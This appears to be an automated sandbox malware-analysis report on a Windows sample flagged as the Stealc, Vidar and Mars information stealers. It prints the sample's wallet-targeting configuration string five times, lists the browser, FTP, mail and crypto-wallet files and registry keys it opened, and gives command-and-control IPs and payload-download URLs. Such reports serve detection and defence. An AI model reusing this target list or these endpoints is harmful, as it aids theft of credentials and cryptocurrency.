Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7873c16243.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467093 Sample: file.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 50 86.23.85.13.in-addr.arpa 2->50 52 18.31.95.13.in-addr.arpa 2->52 68 Snort IDS alert for network traffic 2->68 70 Found malware configuration 2->70 72 Antivirus detection for URL or domain 2->72 74 15 other signatures 2->74 9 file.exe 37 2->9         started        14 explorti.exe 16 2->14         started        16 explorti.exe 2->16         started        signatures3 process4 dnsIp5 54 85.28.47.4, 49710, 62925, 80 GES-ASRU Russian Federation 9->54 56 77.91.77.81, 62915, 62923, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->56 38 C:\Users\user\AppData\...\BAFIEGIECG.exe, PE32 9->38 dropped 40 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->40 dropped 42 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->42 dropped 48 11 other files (7 malicious) 9->48 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Tries to steal Mail credentials (via file / registry access) 9->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 9->96 104 4 other signatures 9->104 18 cmd.exe 1 9->18         started        20 cmd.exe 2 9->20         started        58 77.91.77.82, 62922, 62924, 62926 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 14->58 44 C:\Users\user\AppData\...\7873c16243.exe, PE32 14->44 dropped 46 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->46 dropped 98 Hides threads from debuggers 14->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->100 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->102 22 7873c16243.exe 12 14->22         started        file6 signatures7 process8 signatures9 25 BAFIEGIECG.exe 4 18->25         started        29 conhost.exe 18->29         started        31 conhost.exe 20->31         started        76 Antivirus detection for dropped file 22->76 78 Multi AV Scanner detection for dropped file 22->78 80 Detected unpacking (changes PE section rights) 22->80 82 2 other signatures 22->82 process10 file11 36 C:\Users\user\AppData\Local\...\explorti.exe, PE32 25->36 dropped 84 Antivirus detection for dropped file 25->84 86 Detected unpacking (changes PE section rights) 25->86 88 Machine Learning detection for dropped file 25->88 90 5 other signatures 25->90 33 explorti.exe 25->33         started        signatures12 process13 signatures14 60 Antivirus detection for dropped file 33->60 62 Detected unpacking (changes PE section rights) 33->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 33->64 66 5 other signatures 33->66
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted Domains

Name IP Active
18.31.95.13.in-addr.arpa unknown unknown
86.23.85.13.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • Avira URL Cloud: phishing
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown